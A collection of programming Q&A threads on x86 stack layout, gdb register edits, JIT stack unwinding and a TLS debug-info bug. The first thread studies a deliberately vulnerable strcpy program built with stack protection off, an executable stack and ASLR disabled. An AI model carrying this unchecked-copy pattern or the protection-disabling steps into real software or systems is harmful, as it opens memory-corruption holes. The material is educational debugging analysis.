Why segmentation fault doesn't occur with smaller stack boundary?

Why segmentation fault doesn't occur with smaller stack boundary? - c

I'm trying to understand the difference of behavior between a code compiled with the GCC option -mpreferred-stack-boundary=2 and the default value which is -mpreferred-stack-boundary=4.
I already read a lot of Q/A about this option but I am not able to understand the case I'll described below.
Let's consider this code:
#include <stdio.h>
#include <string.h>
void dumb_function() {}
int main(int argc, char** argv) {
dumb_function();
char buffer[24];
strcpy(buffer, argv[1]);
return 0;
}
On my 64 bits architecture, I want to compile it for 32 bits so I'll use the -m32 option. So, I create two binaries, one with -mpreferred-stack-boundary=2, one with the default value:
sysctl -w kernel.randomize_va_space=0
gcc -m32 -g3 -fno-stack-protector -z execstack -o default vuln.c
gcc -mpreferred-stack-boundary=2 -m32 -g3 -fno-stack-protector -z execstack -o align_2 vuln.c
Now, if I execute them with an overflow of two bytes, I have segmentation fault for the default alignment but not in the other case:
$ ./default 1234567890123456789012345
Segmentation fault (core dumped)
$ ./align_2 1234567890123456789012345
$
I try to dig why this behavior with default. Here is the disassembly of the main function:
08048411 <main>:
8048411: 8d 4c 24 04 lea 0x4(%esp),%ecx
8048415: 83 e4 f0 and $0xfffffff0,%esp
8048418: ff 71 fc pushl -0x4(%ecx)
804841b: 55 push %ebp
804841c: 89 e5 mov %esp,%ebp
804841e: 53 push %ebx
804841f: 51 push %ecx
8048420: 83 ec 20 sub $0x20,%esp
8048423: 89 cb mov %ecx,%ebx
8048425: e8 e1 ff ff ff call 804840b <dumb_function>
804842a: 8b 43 04 mov 0x4(%ebx),%eax
804842d: 83 c0 04 add $0x4,%eax
8048430: 8b 00 mov (%eax),%eax
8048432: 83 ec 08 sub $0x8,%esp
8048435: 50 push %eax
8048436: 8d 45 e0 lea -0x20(%ebp),%eax
8048439: 50 push %eax
804843a: e8 a1 fe ff ff call 80482e0 <strcpy#plt>
804843f: 83 c4 10 add $0x10,%esp
8048442: b8 00 00 00 00 mov $0x0,%eax
8048447: 8d 65 f8 lea -0x8(%ebp),%esp
804844a: 59 pop %ecx
804844b: 5b pop %ebx
804844c: 5d pop %ebp
804844d: 8d 61 fc lea -0x4(%ecx),%esp
8048450: c3 ret
8048451: 66 90 xchg %ax,%ax
8048453: 66 90 xchg %ax,%ax
8048455: 66 90 xchg %ax,%ax
8048457: 66 90 xchg %ax,%ax
8048459: 66 90 xchg %ax,%ax
804845b: 66 90 xchg %ax,%ax
804845d: 66 90 xchg %ax,%ax
804845f: 90 nop
Thanks to sub $0x20,%esp instruction, we can learn the compiler allocates 32 bytes for the stack which is coherent is the -mpreferred-stack-boundary=4 option: 32 is a multiple of 16.
First question: why, if I have a stack of 32 bytes (24 bytes for the buffer and the rest of junk), I get a segmentation fault with an overflow of just one byte?
Let's look what's happening with gdb:
$ gdb default
(gdb) b 10
Breakpoint 1 at 0x804842a: file vuln.c, line 10.
(gdb) b 12
Breakpoint 2 at 0x8048442: file vuln.c, line 12.
(gdb) r 1234567890123456789012345
Starting program: /home/pierre/example/default 1234567890123456789012345
Breakpoint 1, main (argc=2, argv=0xffffce94) at vuln.c:10
10 strcpy(buffer, argv[1]);
(gdb) i f
Stack level 0, frame at 0xffffce00:
eip = 0x804842a in main (vuln.c:10); saved eip = 0xf7e07647
source language c.
Arglist at 0xffffcde8, args: argc=2, argv=0xffffce94
Locals at 0xffffcde8, Previous frame's sp is 0xffffce00
Saved registers:
ebx at 0xffffcde4, ebp at 0xffffcde8, eip at 0xffffcdfc
(gdb) x/6x buffer
0xffffcdc8: 0xf7e1da60 0x080484ab 0x00000002 0xffffce94
0xffffcdd8: 0xffffcea0 0x08048481
(gdb) x/x buffer+36
0xffffcdec: 0xf7e07647
Just before the call to strcpy, we can see the saved eip is 0xf7e07647. We can find this information back from the buffer address (32 bytes for the stack stack + 4 bytes for the esp = 36 bytes).
Let's continue:
(gdb) c
Continuing.
Breakpoint 2, main (argc=0, argv=0x0) at vuln.c:12
12 return 0;
(gdb) i f
Stack level 0, frame at 0xffff0035:
eip = 0x8048442 in main (vuln.c:12); saved eip = 0x0
source language c.
Arglist at 0xffffcde8, args: argc=0, argv=0x0
Locals at 0xffffcde8, Previous frame's sp is 0xffff0035
Saved registers:
ebx at 0xffffcde4, ebp at 0xffffcde8, eip at 0xffff0031
(gdb) x/7x buffer
0xffffcdc8: 0x34333231 0x38373635 0x32313039 0x36353433
0xffffcdd8: 0x30393837 0x34333231 0xffff0035
(gdb) x/x buffer+36
0xffffcdec: 0xf7e07647
We can see the overflow with the next bytes after the buffer: 0xffff0035. Also, where the eip where stored, nothing changed: 0xffffcdec: 0xf7e07647 because the overflow is of two bytes only. However, the saved eip given by info frame changed: saved eip = 0x0 and the segmentation fault occurs if I continue:
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
What's happening? Why my saved eip changed while the overflow is of two bytes only?
Now, let's compare this with the binary compiled with another alignment:
$ objdump -d align_2
...
08048411 <main>:
...
8048414: 83 ec 18 sub $0x18,%esp
...
The stack is exactly 24 bytes. That means an overflow of 2 bytes will override the esp (but still not the eip). Let's check that with gdb:
(gdb) b 10
Breakpoint 1 at 0x804841c: file vuln.c, line 10.
(gdb) b 12
Breakpoint 2 at 0x8048431: file vuln.c, line 12.
(gdb) r 1234567890123456789012345
Starting program: /home/pierre/example/align_2 1234567890123456789012345
Breakpoint 1, main (argc=2, argv=0xffffce94) at vuln.c:10
10 strcpy(buffer, argv[1]);
(gdb) i f
Stack level 0, frame at 0xffffce00:
eip = 0x804841c in main (vuln.c:10); saved eip = 0xf7e07647
source language c.
Arglist at 0xffffcdf8, args: argc=2, argv=0xffffce94
Locals at 0xffffcdf8, Previous frame's sp is 0xffffce00
Saved registers:
ebp at 0xffffcdf8, eip at 0xffffcdfc
(gdb) x/6x buffer
0xffffcde0: 0xf7fa23dc 0x080481fc 0x08048449 0x00000000
0xffffcdf0: 0xf7fa2000 0xf7fa2000
(gdb) x/x buffer+28
0xffffcdfc: 0xf7e07647
(gdb) c
Continuing.
Breakpoint 2, main (argc=2, argv=0xffffce94) at vuln.c:12
12 return 0;
(gdb) i f
Stack level 0, frame at 0xffffce00:
eip = 0x8048431 in main (vuln.c:12); saved eip = 0xf7e07647
source language c.
Arglist at 0xffffcdf8, args: argc=2, argv=0xffffce94
Locals at 0xffffcdf8, Previous frame's sp is 0xffffce00
Saved registers:
ebp at 0xffffcdf8, eip at 0xffffcdfc
(gdb) x/7x buffer
0xffffcde0: 0x34333231 0x38373635 0x32313039 0x36353433
0xffffcdf0: 0x30393837 0x34333231 0x00000035
(gdb) x/x buffer+28
0xffffcdfc: 0xf7e07647
(gdb) c
Continuing.
[Inferior 1 (process 6118) exited normally]
As expected, no segmentation fault here because I don't override the eip.
I don't understand this difference of behavior. In the two cases, the eip is not overriden. The only difference is the size of the stack. What's happening?
Additional information:
This behavior doesn't occur if the dumb_function is not present
I'm using the following version of GCC:
$ gcc -v
gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)
Some information about my system:
$ uname -a
Linux pierre-Inspiron-5567 4.15.0-107-generic #108~16.04.1-Ubuntu SMP Fri Jun 12 02:57:13 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

You're not overwriting the saved eip, it's true. But you are overwriting a pointer that the function is using to find the saved eip. You can actually see this in your i f output; look at "Previous frame's sp" and notice how the two low bytes are 00 35; ASCII 0x35 is 5 and 00 is the terminating null. So although the saved eip is perfectly intact, the machine is fetching its return address from somewhere else, thus the crash.
In more detail:
GCC apparently doesn't trust the startup code to align the stack to 16 bytes, so it takes matters into its own hands (and $0xfffffff0,%esp). But it needs to keep track of the previous stack pointer value, so that it can find its parameters and the return address when needed. This is the lea 0x4(%esp),%ecx, which loads ecx with the address of the dword just above the saved eip on the stack. gdb calls this address "Previous frame's sp", I guess because it was the value of the stack pointer immediately before the caller executed its call main instruction. I will call it P for short.
After aligning the stack, the compiler pushes -0x4(%ecx) which is the argv parameter from the stack, for easy access since it's going to need it later. Then it sets up its stack frame with push %ebp; mov %esp, %ebp. We can keep track of all addresses relative to %ebp from now on, in the way compilers usually do when not optimizing.
The push %ecx a couple lines down stores the address P on the stack at offset -0x8(%ebp). The sub $0x20, %esp makes 32 more bytes of space on the stack (ending at -0x28(%ebp)), but the question is, where in that space does buffer end up being placed? We see it happen after the call to dumb_function, with lea -0x20(%ebp), %eax; push %eax; this is the first argument to strcpy being pushed, which is buffer, so indeed buffer is at -0x20(%ebp), not at -0x28 as you might have guessed. So when you write 24 (=0x18) bytes there, you overwrite two bytes at -0x8(%ebp) which is our stored P pointer.
It's all downhill from here. The corrupted value of P (call it Px) is popped into ecx, and just before the return, we do lea -0x4(%ecx), %esp. Now %esp is garbage and points somewhere bad, so the following ret is sure to lead to trouble. Maybe Px points to unmapped memory and just attempting to fetch the return address from there causes the fault. Maybe it points to readable memory, but the address fetched from that location does not point to executable memory, so the control transfer faults. Maybe the latter does point to executable memory, but the instructions located there are not the ones we want to be executing.
If you take out the call to dumb_function(), the stack layout changes slightly. It's no longer necessary to push ebx around the call to dumb_function(), so the P pointer from ecx now winds up at -4(%ebp), there are 4 bytes of unused space (to maintain alignment), and then buffer is at -0x20(%ebp). So your two-byte overrun goes into space that's not used at all, hence no crash.
And here is the generated assembly with -mpreferred-stack-boundary=2. Now there is no need to re-align the stack, because the compiler does trust the startup code to align the stack to at least 4 bytes (it would be unthinkable for this not to be the case). The stack layout is simpler: push ebp, and subtract 24 more bytes for buffer. Thus your overrun overwrites two bytes of the saved ebp. This is eventually popped from the stack back into ebp, and so main returns to its caller with a value in ebp that is
not the same as on entry. That's naughty, but it so happens that the system startup code doesn't use the value in ebp for anything (indeed in my tests it is set to 0 on entry to main, likely to mark the top of the stack for backtraces), and so nothing bad happens afterwards.

Related

Change on rax register during debug session with gdb does not affect code execution

I'm planning to participate to some of the Capture the flags (CTF) challenges, in the near future. For that reason, I've decided to study assembly. As of now I'm focusing on the usage of the CPU registers. Following some examples that I have found on internet, I tried to debug a very simple "Hello World" program written in C, to see how the CPU registers are used. My environment is Linux and GCC version 11. I compiled my code with the -g flag, in order to include debug symbols.
Following is my very simple C source code:
#include <iostream>
int main (int argc, char** argv)
{
char message_c_str[] = "Hello World from C!";
printf("%s\n", message_c_str);
return 0;
}
Studying the disassembly of the main function, I understand that the string containing the message gets stored inside the RAX (and RDX registers?), before calling the printf function:
└─$ objdump -M intel -D main| grep -A20 main.:
0000000000001159 <main>:
1159: 55 push rbp
115a: 48 89 e5 mov rbp,rsp
115d: 48 83 ec 30 sub rsp,0x30
1161: 89 7d dc mov DWORD PTR [rbp-0x24],edi
1164: 48 89 75 d0 mov QWORD PTR [rbp-0x30],rsi
1168: 48 b8 48 65 6c 6c 6f movabs rax,0x6f57206f6c6c6548
116f: 20 57 6f
1172: 48 ba 72 6c 64 20 66 movabs rdx,0x6d6f726620646c72
1179: 72 6f 6d
117c: 48 89 45 e0 mov QWORD PTR [rbp-0x20],rax
1180: 48 89 55 e8 mov QWORD PTR [rbp-0x18],rdx
1184: c7 45 f0 20 43 21 00 mov DWORD PTR [rbp-0x10],0x214320
118b: 48 8d 45 e0 lea rax,[rbp-0x20]
118f: 48 89 c7 mov rdi,rax
1192: e8 b9 fe ff ff call 1050 <puts#plt>
1197: b8 00 00 00 00 mov eax,0x0
119c: c9 leave
119d: c3 ret
I thought to start a debug session and try to change the RAX on the fly, just for the sake of seeing if I was able to change the string content before printing it on the command line. Unfortunately, even though it seems that I can change the RAX value, the program still prints the hard coded message. So, I'm not sure why I cannot change it. Am I missing to run any gdb command after updating the value of RAX?
Following is my debug session with the issue:
┌──(alexis㉿kali)-[~/Desktop/Hacking/hello_world]
└─$ gdb -q main
Reading symbols from main...
(gdb) break main
Breakpoint 1 at 0x1168: file /home/alexis/Desktop/Hacking/hello_world/main.cpp, line 5.
(gdb) run
Starting program: /home/alexis/Desktop/Hacking/hello_world/main
Breakpoint 1, main (argc=1, argv=0x7fffffffdf58) at
/home/alexis/Desktop/Hacking/hello_world/main.cpp:5
5 char message_c_str[] = "Hello World from C!";
(gdb) info register rax
rax 0x555555555159 93824992235865
(gdb) next
6 printf("%s\n", message_c_str);
(gdb) info register rax
rax 0x6f57206f6c6c6548 8022916924116329800
(gdb) set $rax=0x6361636361
(gdb) info register rax
rax 0x6361636361 426835665761
(gdb) next
Hello World from C!
8 return 0;
(gdb)
You can see that the code still prints "Hello World from C!", even if the RAX register changed. Why?

The string is only temporarily in rax+rdx. In the following lines it is placed on the stack and the address goes to rdi, that is used by puts.
What's important here is to understand that one line of source code is translated to multiple lines of assembly. When you change the rax on line printf("%s\n", message_c_str); the string is already pushed on the stack and rax only keeps an old value as it wasn't overwritten by anything. It is no longer the string that's being printed.
To accomplish your goal you would have to change the string on the stack or change it in rax before it's being pushed onto it (so before your next command).
Also be aware that next advances one source code line. If you want to move one assembly instruction use nexti - with that you have more control about what gets executed.

You're using next (whole block of asm corresponding to a C source line), not nexti or stepi (aka ni or si) to step by asm instruction.
And you made a debug build so GCC doesn't keep anything in registers across C statements. The points where execution stops with next are the ones where the compiler-generated instructions are about to load or LEA a new RAX, so its current value is dead and doesn't matter.
(And it's only using RAX at all because it's a debug build with GCC; otherwise things like lea rax,[rbp-0x20] / mov rdi,rax would LEA straight into RDI, instead of uselessly using RAX as a temporary. Return value from writing an unused parameter when falling off the end of a non-void function Or for mov-immediate to memory, there's no mov r/m64, imm64, only to register, so those moves to RAX and RDX do make sense.)
If you wanted to have it print something different, you could si until after movabs rax,0x6f57206f6c6c6548 but before mov QWORD PTR [rbp-0x20],rax, and at that point change the initializer for part of the string data. (Which is in RAX at that point.) e.g. introducing a 0x00 byte will terminate the C string.
Or right before the call puts, you could set $rdi = $rdi+5 to be like puts(message_c_str + 5).
layout reg or layout asm (use layout next / prev to fix the display if its broken) are helpful for seeing where execution is. See other GDB asm tips at the bottom of https://stackoverflow.com/tags/x86/info

How to use gdb stacktrace with run time generated machine code?

I've inherited some clever x64 machine code for GNU/Linux that creates a machine code wrapper around a c-function call. I guess that in higher language terms the code might be called a decorator or a closure. The code is functioning well, but with the unfortunate artifact that when the wrapper is called, it gobbles the stack trace in gdb.
From what I have learned from the net gdb uses https://en.wikipedia.org/wiki/DWARF as a guide for separating the stack frames in the stack. This works well for static code, but obviously code generated and called at run time isn't registered in the DWARF framework.
My question is if there is any way to rescue the stack trace in this situation?
Here is some similar c-code that shows the problem.
typedef int (*ftype)(int x);
int wuz(int x) { return x + 7; }
int wbar(int x) { return wuz(x)+5; }
int main(int argc, char **argv)
{
const unsigned char wbarcode[] = {
0x55 , // push %rbp
0x48,0x89,0xe5 , // mov %rsp,%rbp
0x48,0x83,0xec,0x08 , // sub $0x8,%rsp
0x89,0x7d,0xfc , // mov %edi,-0x4(%rbp)
0x8b,0x45,0xfc , // mov -0x4(%rbp),%eax
0x89,0xc7 , // mov %eax,%edi
0x48,0xc7,0xc0,0xf6,0x04,0x40,00, // mov $0x4004f6,%rax
0xff,0xd0, // callq *%rax
0x83,0xc0,0x05 , // add $0x5,%eax
0xc9 , // leaveq
0xc3 // retq
};
int wb = wbar(5);
ftype wf = (ftype)wbarcode;
int fwb = wf(5);
}
Compile it by:
gcc -g -o mcode mcode.c
execstack -s mcode
and run it in gdb by:
$ gdb mcode
(gdb) break wuz
If we disassemble wbar we get something very similar to the byte sequence in wbarcode[]. The only difference is that I changed the calling convention for calling wuz().
(gdb) disas/r wbar
Dump of assembler code for function wbar:
0x0000000000400505 <+0>: 55 push %rbp
0x0000000000400506 <+1>: 48 89 e5 mov %rsp,%rbp
0x0000000000400509 <+4>: 48 83 ec 08 sub $0x8,%rsp
0x000000000040050d <+8>: 89 7d fc mov %edi,-0x4(%rbp)
0x0000000000400510 <+11>: 8b 45 fc mov -0x4(%rbp),%eax
0x0000000000400513 <+14>: 89 c7 mov %eax,%edi
0x0000000000400515 <+16>: e8 dc ff ff ff callq 0x4004f6 <wuz>
0x000000000040051a <+21>: 83 c0 05 add $0x5,%eax
0x000000000040051d <+24>: c9 leaveq
0x000000000040051e <+25>: c3 retq
End of assembler dump.
If we now run the program it will stop twice in wuz(). The first time
through our c-call and we can ask for a stack trace through bt.
Breakpoint 3, wuz (x=5) at mcode.c:2
=> 0x00000000004004fd <wuz+7>: 8b 45 fc mov -0x4(%rbp),%eax
0x0000000000400500 <wuz+10>: 83 c0 07 add $0x7,%eax
0x0000000000400503 <wuz+13>: 5d pop %rbp
0x0000000000400504 <wuz+14>: c3 retq
(gdb) bt
#0 wuz (x=5) at mcode.c:2
#1 0x000000000040051a in wbar (x=5) at mcode.c:3
#2 0x00000000004005b0 in main (argc=1, argv=0x7fffffffe528) at mcode.c:20
This is a normal stack trace showing that we got from main() → wbar() → wuz().
But if we now continue we reach wuz() a second time, and we again
request a stack trace:
(gdb) c
Continuing.
Breakpoint 3, wuz (x=5) at mcode.c:2
=> 0x00000000004004fd <wuz+7>: 8b 45 fc mov -0x4(%rbp),%eax
0x0000000000400500 <wuz+10>: 83 c0 07 add $0x7,%eax
0x0000000000400503 <wuz+13>: 5d pop %rbp
0x0000000000400504 <wuz+14>: c3 retq
(gdb) bt
#0 wuz (x=5) at mcode.c:2
#1 0x00007fffffffe419 in ?? ()
#2 0x0000000500000001 in ?? ()
#3 0x00007fffffffe440 in ?? ()
#4 0x00000000004005c6 in main (argc=0, argv=0xffffffff) at mcode.c:22
Backtrace stopped: frame did not save the PC
Even though we have done the same two hierarchical calls, we get a
stack trace that contains the wrong frames. In my original inherited
wrapper code the situation was even worse, as the the stack trace
ended after 5 frames with the top level having address 0.
So the question is again, is there any extra code that can be added to
wbarcode[] that will cause gdb to output a valid stacktrace? Or is
there any other run time technique that may be used to make gdb
recognize the stack frames?

On some architectures, you can just make the frame have the layout that is expected by gdb's default unwinder for that port. However, this isn't available on all architectures. Reading the x86-64 port (see gdb/amd64-tdep.c, in particular the function amd64_frame_cache_1), I think here gdb wants to know the function bounds, so it can try to analyze the prologue. But, the function bounds come from the (ELF) symbol table, so you're out of luck there.
There's still a way, though. Due to the recent (in gdb terms) rise of JIT compilers, gdb provides three other ways to deal with this problem.
One way is that your program can emit a special ELF object (really any object format that gdb understands, IIRC) in memory, and call a runtime hook to inform gdb of its existence. gdb will read this object, including any debug information it contains. This approach is rather heavy, but gives access to most of gdb's capabilities -- you can specify not just the unwinding but also types, local variables, etc.
A second way is somewhat similar. Your program still calls a special hook. However, you also provide a plugin that is loaded by gdb. This plugin can read symbols and other information from the inferior, but in this case the symbols and unwind information don't have to be in any particular format.
The final way (new in gdb 7.10) is that you can write an unwinder in Python. When working on my JIT unwinder, I chose this approach because it is simple to debug, simple to deploy, reasonably flexible, and does not require any particular changes in the inferior.
These methods are all documented in the gdb manual. In some cases, though, I think the documentation leaves a bit to be desired. You may have to find some example code or dig into the gdb sources to really understand how it's supposed to work.

Program compiled with -fPIC crashes while stepping over thread-local variable in GDB

This is a very strange problem which occurs only when the program is compiled with -fPIC option.
Using gdb I'm able to print thread local variables but stepping over them leads to crash.
thread.c
#include <pthread.h>
#include <stdlib.h>
#include <stdio.h>
#define MAX_NUMBER_OF_THREADS 2
struct mystruct {
int x;
int y;
};
__thread struct mystruct obj;
void* threadMain(void *args) {
obj.x = 1;
obj.y = 2;
printf("obj.x = %d\n", obj.x);
printf("obj.y = %d\n", obj.y);
return NULL;
}
int main(int argc, char *arg[]) {
pthread_t tid[MAX_NUMBER_OF_THREADS];
int i = 0;
for(i = 0; i < MAX_NUMBER_OF_THREADS; i++) {
pthread_create(&tid[i], NULL, threadMain, NULL);
}
for(i = 0; i < MAX_NUMBER_OF_THREADS; i++) {
pthread_join(tid[i], NULL);
}
return 0;
}
Compile it using the following: gcc -g -lpthread thread.c -o thread -fPIC
Then while debugging it: gdb ./thread
(gdb) b threadMain
Breakpoint 1 at 0x4006a5: file thread.c, line 15.
(gdb) r
Starting program: /junk/test/thread
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
[New Thread 0x7ffff7fc7700 (LWP 31297)]
[Switching to Thread 0x7ffff7fc7700 (LWP 31297)]
Breakpoint 1, threadMain (args=0x0) at thread.c:15
15 obj.x = 1;
(gdb) p obj.x
$1 = 0
(gdb) n
Program received signal SIGSEGV, Segmentation fault.
threadMain (args=0x0) at thread.c:15
15 obj.x = 1;
Although, if I compile it without -fPIC then this problem doesn't occur.
Before anybody asks me why am I using -fPIC, this is just a reduced test case. We have a huge component which compiles into a so file which then plugs into another component. Therefore, fPIC is necessary.
There is no functional impact because of it, only that debugging is near impossible.
Platform Information: Linux 2.6.32-431.el6.x86_64 #1 SMP Sun Nov 10 22:19:54 EST 2013 x86_64 x86_64 x86_64 GNU/Linux, Red Hat Enterprise Linux Server release 6.5 (Santiago)
Reproducible on the following as well
Linux 3.13.0-66-generic #108-Ubuntu SMP Wed Oct 7 15:20:27
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
gcc (Ubuntu 4.8.4-2ubuntu1~14.04) 4.8.4

The problem lies deep in the bowels of GAS, the GNU assembler, and how it generates DWARF debug information.
The compiler, GCC, has the responsibility of generating a specific sequence of instructions for a position-independent thread-local access, which is documented in the document ELF Handling for Thread-Local Storage, page 22, section 4.1.6: x86-64 General Dynamic TLS Model. This sequence is:
0x00 .byte 0x66
0x01 leaq x#tlsgd(%rip),%rdi
0x08 .word 0x6666
0x0a rex64
0x0b call __tls_get_addr#plt
, and is the way it is because the 16 bytes it occupies leave space for backend/assembler/linker optimizations. Indeed, your compiler generates the following assembler for threadMain():
threadMain:
.LFB2:
.file 1 "thread.c"
.loc 1 14 0
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
subq $16, %rsp
movq %rdi, -8(%rbp)
.loc 1 15 0
.byte 0x66
leaq obj#tlsgd(%rip), %rdi
.value 0x6666
rex64
call __tls_get_addr#PLT
movl $1, (%rax)
.loc 1 16 0
...
The assembler, GAS, then relaxes this code, which contains a function call (!), down to just two instructions. These are:
a mov having an fs:-segment override, and
a lea
, in the final assembly. They occupy between themselves 16 bytes in total, demonstrating why the General Dynamic Model instruction sequence is designed to require 16 bytes.
(gdb) disas/r threadMain
Dump of assembler code for function threadMain:
0x00000000004007f0 <+0>: 55 push %rbp
0x00000000004007f1 <+1>: 48 89 e5 mov %rsp,%rbp
0x00000000004007f4 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x00000000004007f8 <+8>: 48 89 7d f8 mov %rdi,-0x8(%rbp)
0x00000000004007fc <+12>: 64 48 8b 04 25 00 00 00 00 mov %fs:0x0,%rax
0x0000000000400805 <+21>: 48 8d 80 f8 ff ff ff lea -0x8(%rax),%rax
0x000000000040080c <+28>: c7 00 01 00 00 00 movl $0x1,(%rax)
So far, everything has been done correctly. The problem now begins as GAS generates DWARF debug information for your particular assembler code.
While parsing line-by-line in binutils-x.y.z/gas/read.c, function void
read_a_source_file (char *name), GAS encounters .loc 1 15 0, the statement that begins the next line, and runs the handler void dwarf2_directive_loc (int dummy ATTRIBUTE_UNUSED) in dwarf2dbg.c. Unfortunately, the handler does not unconditionally emit debug information for the current offset within the "fragment" (frag_now) of machine code it is currently building. It could have done this by calling dwarf2_emit_insn(0), but the .loc handler currently only does so if it sees multiple .loc directives consecutively. Instead, in our case it continues on to the next line, leaving the debug information unemitted.
On the next line it sees the .byte 0x66 directive of the General Dynamic sequence. This is not, in and of itself, part of an instruction, despite representing the data16 instruction prefix in x86 assembly. GAS acts upon it with the handler cons_worker(), and the fragment increases from 12 bytes to 13 in size.
On the next line it sees a true instruction, leaq, which is parsed by calling the macro assemble_one() that maps to void md_assemble (char *line) in gas/config/tc-i386.c. At the very end of that function, output_insn() is called, which itself finally calls dwarf2_emit_insn(0) and causes debug information to be emitted at last. A new Line Number Statement (LNS) is begun that claims that line 15 began at function-start-address plus previous fragment size, but since we passed over the .byte statement before doing so, the fragment is 1 byte too large, and the computed offset for the first instruction of line 15 is therefore 1 byte off.
Some time later GAS relaxes the Global Dynamic Sequence to the final instruction sequence that starts with mov fs:0x0, %rax. The code size and all offsets remain unchanged because both sequences of instructions are 16 bytes. The debug information is unchanged, and still wrong.
GDB, when it reads the Line Number Statements, is told that the prologue of threadMain(), which is associated with the line 14 on which is found its signature, ends where line 15 begins. GDB dutifully plants a breakpoint at that location, but unfortunately it is 1 byte too far.
When run without a breakpoint, the program runs normally, and sees
64 48 8b 04 25 00 00 00 00 mov %fs:0x0,%rax
. Correctly placing the breakpoint would involve saving and replacing the first byte of an instruction with int3 (opcode 0xcc), leaving
cc int3
48 8b 04 25 00 00 00 00 mov (0x0),%rax
. The normal step-over sequence would then involve restoring the first byte of the instruction, setting the program counter eip to the address of that breakpoint, single-stepping, re-inserting the breakpoint, then continuing the program.
However, when GDB plants the breakpoint at the incorrect address 1 byte too far, the program sees instead
64 cc fs:int3
8b 04 25 00 00 00 00 <garbage>
which is a wierd but still valid breakpoint. That's why you didn't see SIGILL (illegal instruction).
Now, when GDB attempts to step over, it restores the instruction byte, sets the PC to the address of the breakpoint, and this is what it sees now:
64 fs: # CPU DOESN'T SEE THIS!
48 8b 04 25 00 00 00 00 mov (0x0),%rax # <- CPU EXECUTES STARTING HERE!
# BOOM! SEGFAULT!
Because GDB restarted execution one byte too far, the CPU does not decode the fs: instruction prefix byte, and instead executes mov (0x0),%rax with the default segment, which is ds: (data). This immediately results in a read from address 0, the null pointer. The SIGSEGV promptly follows.
All due credits to Mark Plotnick for essentially nailing this.
The solution that was retained is to binary-patch cc1, gcc's actual C compiler, to emit data16 instead of .byte 0x66. This results in GAS parsing the prefix and instruction combination as a single unit, yielding the correct offset in the debug information.

Why does initializing a variable `i` to 0 and to a large size result in the same size of the program?

There is a problem which confuses me a lot.
int main(int argc, char *argv[])
{
int i = 12345678;
return 0;
}
int main(int argc, char *argv[])
{
int i = 0;
return 0;
}
The programs have the same bytes in total. Why?
And where the literal value indeed stored? Text segment or other place?

The programs have the same bytes in total.Why?
There are two possibilities:
The compiler is optimizing out the variable. It isn't used anywhere and therefore doesn't make sense.
If 1. doesn't apply, the program sizes are equal anyway. Why shouldn't they? 0 is just as large in size as 12345678. Two variables of type T occupy the same size in memory.
And where the literal value indeed stored?
On the stack. Local variables are commonly stored on the stack.

Consider your bedroom.if you filled it with stuff or you left it empty,does that change the area of your bedroom?
the size of int is sizeof(int).it does not matter what value you store in it.

Because your program is optimized. At compile time, the compiler found out that i was useless and removed it.
If optimization didn't occurs, another simple explanation is that an int is the same size of another int.

TL;DR
First question: They're the same size because the instructions output of your program are roughly the same (more on that below). Further, they're the same size because the size(number of bytes) of your ints never change.
Second question: i variable is stored in your local variables frame which is in the function stack. The actual value you set to i is in the instructions (hardcoded) in the text-segment.
GDB and Assembly
I know you're using Windows, but consider these codes and output on Linux. I used the exactly same sources you posted.
For the first one, with i = 12345678, the actual main function is these computer instructions:
(gdb) disass main
Dump of assembler code for function main:
0x00000000004004ed <+0>: push %rbp
0x00000000004004ee <+1>: mov %rsp,%rbp
0x00000000004004f1 <+4>: mov %edi,-0x14(%rbp)
0x00000000004004f4 <+7>: mov %rsi,-0x20(%rbp)
0x00000000004004f8 <+11>:movl $0xbc614e,-0x4(%rbp)
0x00000000004004ff <+18>:mov $0x0,%eax
0x0000000000400504 <+23>:pop %rbp
0x0000000000400505 <+24>:retq
End of assembler dump.
As for the other program, with i = 0, main is:
(gdb) disass main
Dump of assembler code for function main:
0x00000000004004ed <+0>: push %rbp
0x00000000004004ee <+1>: mov %rsp,%rbp
0x00000000004004f1 <+4>: mov %edi,-0x14(%rbp)
0x00000000004004f4 <+7>: mov %rsi,-0x20(%rbp)
0x00000000004004f8 <+11>:movl $0x0,-0x4(%rbp)
0x00000000004004ff <+18>:mov $0x0,%eax
0x0000000000400504 <+23>:pop %rbp
0x0000000000400505 <+24>:retq
End of assembler dump.
The only difference between both codes is the actual value being stored in your variable. Lets go in a step by step trough these lines bellow (my computer is x86_64, so if your architecture is different, instructions may differ).
OPCODES
And the actual instructions of main (using objdump):
00000000004004ed <main>:
4004ed: 55 push %rbp
4004ee: 48 89 e5 mov %rsp,%rbp
4004f1: 89 7d ec mov %edi,-0x14(%rbp)
4004f4: 48 89 75 e0 mov %rsi,-0x20(%rbp)
4004f8: c7 45 fc 4e 61 bc 00 movl $0xbc614e,-0x4(%rbp)
4004ff: b8 00 00 00 00 mov $0x0,%eax
400504: 5d pop %rbp
400505: c3 retq
400506: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40050d: 00 00 00
To get the actual difference of bytes, using objdump -D prog1 > prog1_dump and objdump -D prog2 > prog2_dump and them diff prog1_dump prog2_dump:
2c2
< draft1: file format elf64-x86-64
---
> draft2: file format elf64-x86-64
51,58c51,58
< 400283: 00 bc f6 06 64 9f ba add %bh,-0x45609bfa(%rsi,%rsi,8)
< 40028a: 01 3b add %edi,(%rbx)
< 40028c: 14 d1 adc $0xd1,%al
< 40028e: 12 cf adc %bh,%cl
< 400290: cd 2e int $0x2e
< 400292: 11 77 5d adc %esi,0x5d(%rdi)
< 400295: 79 fe jns 400295 <_init-0x113>
< 400297: 3b .byte 0x3b
---
> 400283: 00 e8 add %ch,%al
> 400285: f1 icebp
> 400286: 6e outsb %ds:(%rsi),(%dx)
> 400287: 8a f8 mov %al,%bh
> 400289: a8 05 test $0x5,%al
> 40028b: ab stos %eax,%es:(%rdi)
> 40028c: 48 2d 3f e9 e2 b2 sub $0xffffffffb2e2e93f,%rax
> 400292: f7 06 53 df ba af testl $0xafbadf53,(%rsi)
287c287
